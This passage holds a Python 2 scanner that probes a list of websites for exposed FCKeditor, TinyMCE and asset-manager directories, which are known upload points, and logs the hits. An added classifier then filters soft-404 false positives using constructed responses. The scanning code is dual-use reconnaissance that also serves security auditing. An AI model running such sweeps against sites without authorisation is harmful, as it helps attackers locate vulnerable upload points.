        'otkup_test/fckeditor/', 'shop/assets/js/fckeditor/', 'webshop//portal/templates/fckeditor/',
        'new/aset/js/fckeditor/', 'siebenkorn/script/FCKeditor', 'assetmanager/HTMLEditor/',
        'portal/handlers/tiny_mce/', 'fa/handlers/tiny_mce/', 'handlers/tiny_mce/',
        'plugins/tiny_mce/', 'zp-core/plugins/tiny_mce/', 'wp-content/plugins/asset-manager/',
        'plugins/asset-manager/']

# A directory listing or an explicit "Forbidden" page both mean the path exists
markers = ['403 - Forbidden: Access is denied.', 'Directory Listing Denied', 'Parent Directory',
           'Forbidden', 'Index of /', 'Directory Listing For']

# No Accept-Encoding here: urllib2 does not decompress gzip, and the markers would never match a compressed body
hdr = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0',
       'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
       'Accept-Language': 'en-US,en;q=0.5',
       'Connection': 'keep-alive'}


def record(site):
    print "OK >>>" + site
    out = open("fckeditor.txt", "a")    # separate handle: the original reused f, the input list's handle
    out.write(site + "\n")
    out.close()


try:
    f = open(sys.argv[1], 'r')
    for line in f.readlines():
        line = line.rstrip()
        for subdir in dirs:
            site = "%s/%s" % (line, subdir)
            print site
            req = urllib2.Request(site, headers=hdr)
            try:
                content = urllib2.urlopen(req).read()
                if any(eMSG in content for eMSG in markers):
                    record(site)
            except urllib2.HTTPError, e:         # 403/404 bodies still carry the marker strings
                page = e.fp.read()
                if any(eMSG in page for eMSG in markers):
                    record(site)
            except urllib2.URLError:
                print "Time Out\nTry To Another..."
            except ValueError:
                print "Please Input valid URL"
            except socket.timeout:
                print "Time Out"
    f.close()
except IOError:
    print "Please Input Correct File Name"
    sys.exit(1)
except KeyboardInterrupt:
    print "You pressed Ctrl+C"
```
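The finder above marks a path as found whenever one of its marker strings shows up in the body, which also fires on hosts that answer every unknown URL with a 200 "not found" page containing a "Parent Directory" link. As an added example (my own code, not the finder's), the classifier below adds the baseline check a practitioner would run first: request a random path that cannot exist, then treat any probe whose status and body match that baseline as absent, whatever words it contains. Responses here are constructed, not captured from a real host.

```python
import re

# Body fragments the page's finder treats as "the path exists"
PRESENCE_MARKERS = ("403 - Forbidden: Access is denied.", "Directory Listing Denied", "Parent Directory",
                    "Forbidden", "Index of /", "Directory Listing For")


def _normalise(body, path):
    """Drop the echoed request path and collapse whitespace so catch-all pages compare equal."""
    return re.sub(r"\s+", " ", body.replace(path, "")).strip()


def classify(status, body, path, baseline=None):
    """One probe -> 'present' | 'absent' | 'unknown'.

    baseline = (status, body, path) of a request for a random, surely-missing path on the same
    host; a probe that looks exactly like it is a soft-404, whatever marker words it contains."""
    if baseline is not None:
        b_status, b_body, b_path = baseline
        if status == b_status and _normalise(body, path) == _normalise(b_body, b_path):
            return "absent"
    if status == 404:
        return "absent"
    if status in (401, 403):
        return "present"            # exists but access-controlled: the page's "restricted access" case
    if status == 200 and any(m in body for m in PRESENCE_MARKERS):
        return "present"
    return "unknown"


# Constructed responses (status, body, requested path); not captured from a real host
SOFT404 = "<html><body><h1>Oops</h1><p>Page %s not found.</p><a href='/'>Parent Directory</a></body></html>"
SAMPLES = {
    "iis_forbidden":  (403, "<h1>403 - Forbidden: Access is denied.</h1>", "/fckeditor/editor/filemanager/"),
    "apache_listing": (200, "<title>Index of /admin/fckeditor</title><a href='../'>Parent Directory</a>", "/admin/fckeditor/"),
    "real_404":       (404, "<h1>Not Found</h1>", "/js/fckeditor/"),
    "soft_404":       (200, SOFT404 % "/plugins/fckeditor/", "/plugins/fckeditor/"),
}
BASELINE = (200, SOFT404 % "/zz9pzzqx-does-not-exist/", "/zz9pzzqx-does-not-exist/")


def probe_results(with_baseline=True):
    """Classify every sample, with or without the soft-404 baseline."""
    base = BASELINE if with_baseline else None
    return {name: classify(s, b, p, base) for name, (s, b, p) in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in sorted(probe_results().items()):
        print("%-15s %s" % (name, verdict))
    print("soft_404 without baseline:", probe_results(with_baseline=False)["soft_404"])
```

In a real scan the baseline is one extra request per host before the path list runs; feeding each probe's status code, body and path into `classify` replaces the marker loop in the script above and removes the soft-404 false positives that the marker words alone cannot.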